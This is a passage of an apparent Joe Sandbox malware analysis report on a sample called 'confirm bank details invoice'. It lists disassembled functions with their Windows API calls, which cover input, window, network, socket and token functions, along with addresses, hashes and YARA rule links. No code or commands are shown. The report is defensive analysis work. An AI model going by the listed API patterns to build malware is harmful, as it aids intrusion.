                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 23704c4e2c6f834ab1fd8918042a162651c4eb28b6516714d7cefa9ec469b4f5
                    • Instruction ID: 60a61e11263ad364b9b4a44f749dc03845bef52fa23d16cdd596c76a89ec2bca
                    • Opcode Fuzzy Hash: 23704c4e2c6f834ab1fd8918042a162651c4eb28b6516714d7cefa9ec469b4f5
                    • Instruction Fuzzy Hash: 95312630908258AEEF208F6688197FF7BAA9B55316F04021BE481932D3C77CAB45D77D
                    Function 004A4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004A4038
                    • __isleadbyte_l.LIBCMT ref: 004A4066
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004A4094
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004A40CA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 24fbea4493346f7e1986e746015532ad057759cdd0400917fd0433168cb6cecd
                    • Instruction ID: dd13050f545c16d47fb08dcb6b1e4c35c2628e1f014c8b4bfd81a4ccf7fff38a
                    • Opcode Fuzzy Hash: 24fbea4493346f7e1986e746015532ad057759cdd0400917fd0433168cb6cecd
                    • Instruction Fuzzy Hash: A931D430508206EFDF219F35C845B7F7BA5BFD2310F15402AE6518B290D7B9D891E794
                    Function 004D7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32 ref: 004D7CB9
                      • Part of subcall function 004B5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 004B5F6F
                      • Part of subcall function 004B5F55: GetCurrentThreadId.KERNEL32 ref: 004B5F76
                      • Part of subcall function 004B5F55: AttachThreadInput.USER32(00000000,?,004B781F), ref: 004B5F7D
                    • GetCaretPos.USER32(?), ref: 004D7CCA
                    • ClientToScreen.USER32(00000000,?), ref: 004D7D03
                    • GetForegroundWindow.USER32 ref: 004D7D09
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: 941efb3fd3a75cca378b14e2d73112c42255b6980a04fa218375d85893f8bdfd
                    • Instruction ID: cfac0058d985ca1faef04743bea2f8268a4634ce7b856e5d70bc8c029202d180
                    • Opcode Fuzzy Hash: 941efb3fd3a75cca378b14e2d73112c42255b6980a04fa218375d85893f8bdfd
                    • Instruction Fuzzy Hash: DF310C71900108AFDB00EFAAD9859FFFBF9EF58314B10846BE815E7211DA759A05CBA4
                    Function 004DF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • GetCursorPos.USER32(?), ref: 004DF211
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004EE4C0,?,?,?,?,?), ref: 004DF226
                    • GetCursorPos.USER32(?), ref: 004DF270
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004EE4C0,?,?,?), ref: 004DF2A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: 954d4569ee07dd7e6dbeb330ca31dadace55e385f365d7127c0852da7f505938
                    • Instruction ID: 7d0da09f7e4c1bec2bf4e87e963ca851a5fae7b3d66c733450db56111a91458d
                    • Opcode Fuzzy Hash: 954d4569ee07dd7e6dbeb330ca31dadace55e385f365d7127c0852da7f505938
                    • Instruction Fuzzy Hash: 8521CE39500018AFCB258F94D869EFF7BB5EB0A310F0440AAF9064B7A1D3399955DB98
                    Function 004C431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004C4358
                      • Part of subcall function 004C43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004C4401
                      • Part of subcall function 004C43E2: InternetCloseHandle.WININET(00000000), ref: 004C449E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 354c3a2a70878e1d2d4d4855c16ee5ddc8f2cbd9e089cd1ffc0bfe4a2e5e73c8
                    • Instruction ID: 380d05f478821c48a503cc14ac64d5791fa1e09e9ee54d04945fa5548095dd1b
                    • Opcode Fuzzy Hash: 354c3a2a70878e1d2d4d4855c16ee5ddc8f2cbd9e089cd1ffc0bfe4a2e5e73c8
                    • Instruction Fuzzy Hash: 7821FF39300601BBEB519F618D10FBBBBAAFFC4710F10402FBA0586660DB75982197A8
                    Function 004C8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                    Download Yara Rule
                    APIs
                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 004C8AE0
                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 004C8AF2
                    • accept.WSOCK32(00000000,00000000,00000000), ref: 004C8AFF
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8B16
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorLastacceptselect
                    • String ID:
                    • API String ID: 385091864-0
                    • Opcode ID: cafcc90c007f4b390c815130feff5ee6ad7760bdaadf16bfe4efad18d33e9f37
                    • Instruction ID: 2af5bfef340a7025cf53781c685e131180d33ac5dd30dd2ca194fa18adf6a706
                    • Opcode Fuzzy Hash: cafcc90c007f4b390c815130feff5ee6ad7760bdaadf16bfe4efad18d33e9f37
                    • Instruction Fuzzy Hash: CD219675A001249FC7119F69C985AAEBBFCEF49314F00416EF849D7291DB749D41CF94
                    Function 004D8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowLongW.USER32(?,000000EC), ref: 004D8AA6
                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004D8AC0
                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004D8ACE
                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004D8ADC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$Long$AttributesLayered
                    • String ID:
                    • API String ID: 2169480361-0
                    • Opcode ID: c15d96ada8cb660aa667ad45f1e9396e6083e8600b3f92f6df0472d6c2238332
                    • Instruction ID: e34351b3dfeeed01756eb7d32dbf8e9bddd9d386d188113932521cc8aa14cef3
                    • Opcode Fuzzy Hash: c15d96ada8cb660aa667ad45f1e9396e6083e8600b3f92f6df0472d6c2238332
                    • Instruction Fuzzy Hash: FE11AF31605111AFDB04AB19CC15FBA77A9AF85324F14811FF81AC73E2CBB8AC11C798
                    Function 004B0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004B1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004B0ABB,?,?,?,004B187A,00000000,000000EF,00000119,?,?), ref: 004B1E77
                      • Part of subcall function 004B1E68: lstrcpyW.KERNEL32(00000000,?,?,004B0ABB,?,?,?,004B187A,00000000,000000EF,00000119,?,?,00000000), ref: 004B1E9D
                      • Part of subcall function 004B1E68: lstrcmpiW.KERNEL32(00000000,?,004B0ABB,?,?,?,004B187A,00000000,000000EF,00000119,?,?), ref: 004B1ECE
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004B187A,00000000,000000EF,00000119,?,?,00000000), ref: 004B0AD4
                    • lstrcpyW.KERNEL32(00000000,?,?,004B187A,00000000,000000EF,00000119,?,?,00000000), ref: 004B0AFA
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,004B187A,00000000,000000EF,00000119,?,?,00000000), ref: 004B0B2E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 6a11249edacd258a8aa359bb1d61827aa709f7eec5e74e0c34193875a2a96a12
                    • Instruction ID: 5762be077cb26b9d486c73677e37dd2dbff6e3e02031fc8d5f3f490463baa650
                    • Opcode Fuzzy Hash: 6a11249edacd258a8aa359bb1d61827aa709f7eec5e74e0c34193875a2a96a12
                    • Instruction Fuzzy Hash: 0A11D336200305AFDB25AF64DC15DBB77A9FF45314B80412BE806CB2A0EB75E850C7A9
                    Function 004A2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 004A2FB5
                      • Part of subcall function 0049395C: __FF_MSGBANNER.LIBCMT ref: 00493973
                      • Part of subcall function 0049395C: __NMSG_WRITE.LIBCMT ref: 0049397A
                      • Part of subcall function 0049395C: RtlAllocateHeap.NTDLL(01100000,00000000,00000001,00000001,00000000,?,?,0048F507,?,0000000E), ref: 0049399F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 738dacc0a7ea901b83d051cd2f275cb8b90254fbb618d22868a80a681a6e0b98
                    • Instruction ID: eefa544cb9b3b8ae1f5691d71bf132ffa8be27c70e8ae90d77b5b9da4afe3cb4
                    • Opcode Fuzzy Hash: 738dacc0a7ea901b83d051cd2f275cb8b90254fbb618d22868a80a681a6e0b98
                    • Instruction Fuzzy Hash: 3611E732808212AFDF213F75AC0466A3F94AF26369F20443BF9499A255DA7CC940A79D
                    Function 004B058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004B05AC
                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004B05C7
                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004B05DD
                    • FreeLibrary.KERNEL32(?), ref: 004B0632
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                    • String ID:
                    • API String ID: 3137044355-0
                    • Opcode ID: 0b6e2f1b039ed88c1927dfe95865c82a6ef0c42878f9ccc4012b834b051bb994
                    • Instruction ID: ca5a41a1cf294f0f43c26f27291e9a96873d6389277dcc81efc7f81be9c9566c
                    • Opcode Fuzzy Hash: 0b6e2f1b039ed88c1927dfe95865c82a6ef0c42878f9ccc4012b834b051bb994
                    • Instruction Fuzzy Hash: 8D217C71900209EFDB20CF95DC88AEBBBB8EF40705F0084AEE51692150D778EA65DF69
                    Function 004B6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004B6733
                    • _memset.LIBCMT ref: 004B6754
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004B67A6
                    • CloseHandle.KERNEL32(00000000), ref: 004B67AF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: 92295c40cf2482937e5ebea444252185445a63d7975ec79d0bb5ab7833a10b5b
                    • Instruction ID: a191c1c82519486000425e3286a2671d83057f3222f522d614766f97caee1209
                    • Opcode Fuzzy Hash: 92295c40cf2482937e5ebea444252185445a63d7975ec79d0bb5ab7833a10b5b
                    • Instruction Fuzzy Hash: A111E771D012287AE72057A9AC4DFEBBABCEF44724F1141AAF904E7180D6744E80CBB9
                    Function 004AB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004AAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004AAA79
                      • Part of subcall function 004AAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004AAA83
                      • Part of subcall function 004AAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004AAA92
                      • Part of subcall function 004AAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004AAA99
                      • Part of subcall function 004AAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004AAAAF
                    • GetLengthSid.ADVAPI32(?,00000000,004AADE4,?,?), ref: 004AB21B
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004AB227
                    • HeapAlloc.KERNEL32(00000000), ref: 004AB22E
                    • CopySid.ADVAPI32(?,00000000,?), ref: 004AB247
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                    • String ID:
                    • API String ID: 4217664535-0
                    • Opcode ID: a5ff96bb9142f16b0bc43bac263267d036520b8e6d575897907811783a85b29c
                    • Instruction ID: 0378ad8a68d2074fea8a068106dff246a98f20d12082a51611a2cdfd88a04886
                    • Opcode Fuzzy Hash: a5ff96bb9142f16b0bc43bac263267d036520b8e6d575897907811783a85b29c
                    • Instruction Fuzzy Hash: 1A11E272A00204AFCB149F94CC48BBFB7A9EF9A308F14806FE54297211D739AE44CB54
                    Function 004AB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004AB498
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004AB4AA
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004AB4C0
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004AB4DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 824aad3e2e8bbb34760a51ec1746e5481d2189f3e349b60f5795145473d724f8
                    • Instruction ID: 826aeadebd3b61570b2df414282ba1ded2dec5d23250487a041fe15bde50b3a9
                    • Opcode Fuzzy Hash: 824aad3e2e8bbb34760a51ec1746e5481d2189f3e349b60f5795145473d724f8
                    • Instruction Fuzzy Hash: E011487A900218FFEB11DFA9CD81E9DBBB4FB09700F204092E604B7291D771AE11DB94
                    Function 0048B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0048B5A5
                    • GetClientRect.USER32(?,?), ref: 004EE69A
                    • GetCursorPos.USER32(?), ref: 004EE6A4
                    • ScreenToClient.USER32(?,?), ref: 004EE6AF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: af7a4aad87dcacb878055a67ea44745ccca1eb592154fafdeefbdea6ab4aa7da
                    • Instruction ID: de829ba00011b7c5b7cc69215768a64422fb5618ca2903001e7e9b72aa53cd3e
                    • Opcode Fuzzy Hash: af7a4aad87dcacb878055a67ea44745ccca1eb592154fafdeefbdea6ab4aa7da
                    • Instruction Fuzzy Hash: 6D114C31900429BFDB11EFA5DC459FE77B9EF09309F500856F901E7240D738AA92CBA9
                    Function 004B732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 004B7352
                    • MessageBoxW.USER32(?,?,?,?), ref: 004B7385
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004B739B
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004B73A2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                    • String ID:
                    • API String ID: 2880819207-0
                    • Opcode ID: 80a803134bf660052429d5d3fde8b60369e757cbc943ba2c1f8c28768ae4c043
                    • Instruction ID: c76a249f726a68a8fa2d8e64f67e9312c3faedaf8f83edb8951a0b50ac0a3082
                    • Opcode Fuzzy Hash: 80a803134bf660052429d5d3fde8b60369e757cbc943ba2c1f8c28768ae4c043
                    • Instruction Fuzzy Hash: A911E576A04204ABC7019B689C05AEF7BEE9B85310F144266FD21D3351D6748914D7B9
                    Function 0048D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                    Download Yara Rule
                    APIs
                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0048D1BA
                    • GetStockObject.GDI32(00000011), ref: 0048D1CE
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0048D1D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateMessageObjectSendStockWindow
                    • String ID:
                    • API String ID: 3970641297-0
                    • Opcode ID: 59e9a08e90abc001f38090dea5a5a2bd5410f2f29fd67aeead3f2064314f04a5
                    • Instruction ID: 816fd28ff46fe24a0ce6f670e82d3937fa6e8f5251105916f3116ac605ace82c
                    • Opcode Fuzzy Hash: 59e9a08e90abc001f38090dea5a5a2bd5410f2f29fd67aeead3f2064314f04a5
                    • Instruction Fuzzy Hash: 5511A172902509BFEB026F919C58EEEBB6AFF08364F040116FA0592190CB359C60EBA4
                    Function 004A4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
